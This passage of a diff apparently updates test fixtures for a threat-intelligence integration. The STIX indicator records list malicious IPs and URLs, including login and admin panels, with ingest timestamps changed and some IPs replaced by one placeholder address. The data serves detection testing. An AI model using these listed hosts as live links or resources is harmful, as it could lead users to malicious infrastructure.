CyberCrime\",\"id\":\"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:56:49.862Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.862Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6776,7 +6776,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 51.89.138.152", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime", "modified": "2020-01-26T02:56:49.900Z", "valid_from": "2020-01-26T02:56:49.9Z", @@ -6798,12 +6798,12 @@ "first_seen": "2020-01-26T02:56:49.900Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "51.89.138.152" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385676644Z", - "original": "{\"created\":\"2020-01-26T02:56:49.9Z\",\"description\":\"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-01-26T02:56:49.9Z\",\"name\":\"mal_ip: 51.89.138.152\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '51.89.138.152']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.9Z\"}", + "ingested": "2021-12-13T08:38:40.023329200Z", + "original": "{\"created\":\"2020-01-26T02:56:49.9Z\",\"description\":\"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-01-26T02:56:49.9Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.9Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6853,7 +6853,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385681053Z", + "ingested": "2021-12-13T08:38:40.023334600Z", "original": "{\"created\":\"2020-01-26T02:56:49.93Z\",\"description\":\"TS ID: 55256890130; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--8fb33d6a-4ed9-4c5a-9a8e-d7fc7e77b9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-26T02:56:49.93Z\",\"name\":\"mal_url: http://0409.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0409.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.93Z\"}", "category": "threat", "type": "indicator", @@ -6904,7 +6904,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385685050Z", + "ingested": "2021-12-13T08:38:40.023358400Z", "original": "{\"created\":\"2020-01-26T02:57:03.544Z\",\"description\":\"TS ID: 55256890157; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--96012440-e95d-46f0-9b70-3f495f4bab32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:57:03.544Z\",\"name\":\"mal_url: http://jor1.mirtakala.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.mirtakala.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:03.544Z\"}", "category": "threat", "type": "indicator", @@ -6923,7 +6923,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://92.63.197.185/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-01-26T02:57:10.525Z", "valid_from": "2020-01-26T02:57:10.525Z", @@ -6947,16 +6947,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://92.63.197.185/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "92.63.197.185", - "full": "http://92.63.197.185/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385689148Z", - "original": "{\"created\":\"2020-01-26T02:57:10.525Z\",\"description\":\"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:10.525Z\",\"name\":\"mal_url: http://92.63.197.185/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.197.185/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.525Z\"}", + "ingested": "2021-12-13T08:38:40.023362100Z", + "original": "{\"created\":\"2020-01-26T02:57:10.525Z\",\"description\":\"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:10.525Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.525Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7007,7 +7007,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385693346Z", + "ingested": "2021-12-13T08:38:40.023365700Z", "original": "{\"created\":\"2020-01-26T02:57:10.571Z\",\"description\":\"TS ID: 55256890135; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--275f3354-1d9c-4167-9f1a-abb06bb0f138\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-26T02:57:10.571Z\",\"name\":\"mal_url: http://pnumbrero3.ru/soft/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pnumbrero3.ru/soft/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.571Z\"}", "category": "threat", "type": "indicator", @@ -7058,7 +7058,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385697734Z", + "ingested": "2021-12-13T08:38:40.023369700Z", "original": "{\"created\":\"2020-01-26T02:57:14.057Z\",\"description\":\"TS ID: 55256890127; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--b449e457-5327-40a2-8bda-0167c219490c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:14.057Z\",\"name\":\"mal_url: http://10122.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10122.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:14.057Z\"}", "category": "threat", "type": "indicator", @@ -7109,7 +7109,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385702082Z", + "ingested": "2021-12-13T08:38:40.023374700Z", "original": "{\"created\":\"2020-01-26T02:57:26.003Z\",\"description\":\"TS ID: 55256890125; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--c8559f01-42c4-42f1-8464-e2e2e2af84d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:26.003Z\",\"name\":\"mal_url: http://10123.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10123.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:26.003Z\"}", "category": "threat", "type": "indicator", @@ -7161,7 +7161,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385713864Z", + "ingested": "2021-12-13T08:38:40.023380100Z", "original": "{\"created\":\"2020-01-26T02:57:30.579Z\",\"description\":\"TS ID: 55256890134; iType: mal_url; State: active; Org: Reg.Ru Hosting; Source: CyberCrime\",\"id\":\"indicator--5898c646-c44b-4365-9d82-77bb1705b6de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:30.579Z\",\"name\":\"mal_url: http://u0929560.cp.regruhosting.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u0929560.cp.regruhosting.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:30.579Z\"}", "category": "threat", "type": "indicator", @@ -7212,7 +7212,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385729323Z", + "ingested": "2021-12-13T08:38:40.023386200Z", "original": "{\"created\":\"2020-01-27T02:54:45.711Z\",\"description\":\"TS ID: 55259870663; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--f5e450ee-d6c5-4a92-bfb4-4f8025b8c7e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:45.711Z\",\"name\":\"mal_url: http://turames3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:45.711Z\"}", "category": "threat", "type": "indicator", @@ -7263,7 +7263,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385736567Z", + "ingested": "2021-12-13T08:38:40.023389900Z", "original": "{\"created\":\"2020-01-27T02:54:59.928Z\",\"description\":\"TS ID: 55259870666; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--05b6bf66-2f31-4640-9ecd-9f8a3408d594\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:59.928Z\",\"name\":\"mal_url: http://turames.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:59.928Z\"}", "category": "threat", "type": "indicator", @@ -7314,7 +7314,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385742338Z", + "ingested": "2021-12-13T08:38:40.023395700Z", "original": "{\"created\":\"2020-01-27T02:55:12.572Z\",\"description\":\"TS ID: 55259870784; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff7fb9bd-e816-4a76-ae5c-72c22980c722\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:12.572Z\",\"name\":\"mal_url: http://bumaga5.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga5.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:12.572Z\"}", "category": "threat", "type": "indicator", @@ -7365,7 +7365,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385747487Z", + "ingested": "2021-12-13T08:38:40.023399700Z", "original": "{\"created\":\"2020-01-27T02:55:14.232Z\",\"description\":\"TS ID: 55259870699; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b0a1e3ec-d523-4e98-90d6-8ad3daa321d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.232Z\",\"name\":\"mal_url: http://mogute.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogute.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.232Z\"}", "category": "threat", "type": "indicator", @@ -7416,7 +7416,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385752336Z", + "ingested": "2021-12-13T08:38:40.023403900Z", "original": "{\"created\":\"2020-01-27T02:55:14.255Z\",\"description\":\"TS ID: 55259870694; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--92f0ba43-ec1f-4a37-b933-33ddd3da7e2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.255Z\",\"name\":\"mal_url: http://moguto.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguto.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.255Z\"}", "category": "threat", "type": "indicator", @@ -7467,7 +7467,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385757025Z", + "ingested": "2021-12-13T08:38:40.023407900Z", "original": "{\"created\":\"2020-01-27T02:55:30.174Z\",\"description\":\"TS ID: 55259870793; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ea0af135-c3c0-4e4e-96d9-bdf1ebb9699e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:30.174Z\",\"name\":\"mal_url: http://bumaga1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.174Z\"}", "category": "threat", "type": "indicator", @@ -7518,7 +7518,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385761614Z", + "ingested": "2021-12-13T08:38:40.023411900Z", "original": "{\"created\":\"2020-01-27T02:55:30.287Z\",\"description\":\"TS ID: 55259870765; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0de60f9b-7383-4c60-9caf-c578c3682487\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-27T02:55:30.287Z\",\"name\":\"mal_url: http://dufre1in.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1in.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.287Z\"}", "category": "threat", "type": "indicator", @@ -7569,7 +7569,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385765952Z", + "ingested": "2021-12-13T08:38:40.023417Z", "original": "{\"created\":\"2020-01-27T02:55:30.319Z\",\"description\":\"TS ID: 55259870697; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e8d57d94-82ce-4ce3-a983-d6928172d795\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:30.319Z\",\"name\":\"mal_url: http://moguti.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguti.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.319Z\"}", "category": "threat", "type": "indicator", @@ -7621,7 +7621,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385770591Z", + "ingested": "2021-12-13T08:38:40.023420900Z", "original": "{\"created\":\"2020-01-27T02:55:30.343Z\",\"description\":\"TS ID: 55259870654; iType: mal_url; State: active; Org: Lir Ukraine LLC; Source: CyberCrime\",\"id\":\"indicator--4b567c10-4d32-40e4-87fd-b4654de5bf6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-27T02:55:30.343Z\",\"name\":\"mal_url: http://stcubegames.netxi.in/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stcubegames.netxi.in/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.343Z\"}", "category": "threat", "type": "indicator", @@ -7672,7 +7672,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385775049Z", + "ingested": "2021-12-13T08:38:40.023424400Z", "original": "{\"created\":\"2020-01-27T02:55:34.56Z\",\"description\":\"TS ID: 55259870763; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ab82b31f-02c9-4d98-b49f-21ab18a48b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-27T02:55:34.56Z\",\"name\":\"mal_url: http://dufre3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.56Z\"}", "category": "threat", "type": "indicator", @@ -7723,7 +7723,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385779728Z", + "ingested": "2021-12-13T08:38:40.023427900Z", "original": "{\"created\":\"2020-01-27T02:55:34.609Z\",\"description\":\"TS ID: 55259870730; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--47a1bc0c-5444-4c92-a0f8-a51655dd84e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:34.609Z\",\"name\":\"mal_url: http://merop12.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merop12.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.609Z\"}", "category": "threat", "type": "indicator", @@ -7774,7 +7774,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385784457Z", + "ingested": "2021-12-13T08:38:40.023431700Z", "original": "{\"created\":\"2020-01-27T02:55:36.798Z\",\"description\":\"TS ID: 55259870681; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e3ee6b9d-f8cd-42fa-8f51-bb0d54446734\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:36.798Z\",\"name\":\"mal_url: http://ramesvet.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:36.798Z\"}", "category": "threat", "type": "indicator", @@ -7825,7 +7825,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385788775Z", + "ingested": "2021-12-13T08:38:40.023435800Z", "original": "{\"created\":\"2020-01-27T02:55:38.721Z\",\"description\":\"TS ID: 55259870761; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ce0e3226-1587-4fd1-bdd0-aa76c548e8df\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:38.721Z\",\"name\":\"mal_url: http://dufres.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufres.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:38.721Z\"}", "category": "threat", "type": "indicator", @@ -7876,7 +7876,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385792832Z", + "ingested": "2021-12-13T08:38:40.023440900Z", "original": "{\"created\":\"2020-01-27T02:55:45.512Z\",\"description\":\"TS ID: 55259870706; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9c90ff74-a454-49c7-afa8-1339915ceac8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:45.512Z\",\"name\":\"mal_url: http://mogut3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:45.512Z\"}", "category": "threat", "type": "indicator", @@ -7927,7 +7927,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385797281Z", + "ingested": "2021-12-13T08:38:40.023445300Z", "original": "{\"created\":\"2020-01-27T02:55:48.012Z\",\"description\":\"TS ID: 55259870655; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--15806179-df3f-450a-baf5-8e2a29d87faa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-27T02:55:48.012Z\",\"name\":\"mal_url: http://vidar321.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vidar321.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:48.012Z\"}", "category": "threat", "type": "indicator", @@ -7946,7 +7946,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://91.90.192.161/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime", "modified": "2020-01-27T02:55:50.673Z", "valid_from": "2020-01-27T02:55:50.673Z", @@ -7970,16 +7970,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://91.90.192.161/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "91.90.192.161", - "full": "http://91.90.192.161/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385801609Z", - "original": "{\"created\":\"2020-01-27T02:55:50.673Z\",\"description\":\"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:50.673Z\",\"name\":\"mal_url: http://91.90.192.161/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://91.90.192.161/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:50.673Z\"}", + "ingested": "2021-12-13T08:38:40.023474600Z", + "original": "{\"created\":\"2020-01-27T02:55:50.673Z\",\"description\":\"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:50.673Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:50.673Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7997,7 +7997,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://95.181.178.210/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime", "modified": "2020-01-27T02:56:02.067Z", "valid_from": "2020-01-27T02:56:02.067Z", @@ -8021,16 +8021,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://95.181.178.210/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "95.181.178.210", - "full": "http://95.181.178.210/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385806127Z", - "original": "{\"created\":\"2020-01-27T02:56:02.067Z\",\"description\":\"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime\",\"id\":\"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-01-27T02:56:02.067Z\",\"name\":\"mal_url: http://95.181.178.210/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://95.181.178.210/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:02.067Z\"}", + "ingested": "2021-12-13T08:38:40.023479800Z", + "original": "{\"created\":\"2020-01-27T02:56:02.067Z\",\"description\":\"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime\",\"id\":\"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-01-27T02:56:02.067Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:02.067Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8080,7 +8080,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385810776Z", + "ingested": "2021-12-13T08:38:40.023485700Z", "original": "{\"created\":\"2020-01-27T02:56:03.948Z\",\"description\":\"TS ID: 55259870672; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ee8c37a6-cb8b-478c-b527-2506637ceb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:03.948Z\",\"name\":\"mal_url: http://turams.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turams.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:03.948Z\"}", "category": "threat", "type": "indicator", @@ -8131,7 +8131,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385816116Z", + "ingested": "2021-12-13T08:38:40.023491300Z", "original": "{\"created\":\"2020-01-27T02:56:05.787Z\",\"description\":\"TS ID: 55259870662; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fd1feff8-dcc5-429a-953d-0bb80951bf5c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:05.787Z\",\"name\":\"mal_url: http://turames8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:05.787Z\"}", "category": "threat", "type": "indicator", @@ -8182,7 +8182,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385820484Z", + "ingested": "2021-12-13T08:38:40.023498100Z", "original": "{\"created\":\"2020-01-27T02:56:17.615Z\",\"description\":\"TS ID: 55259870820; iType: mal_url; State: active; Org: Friendhosting LTD; Source: 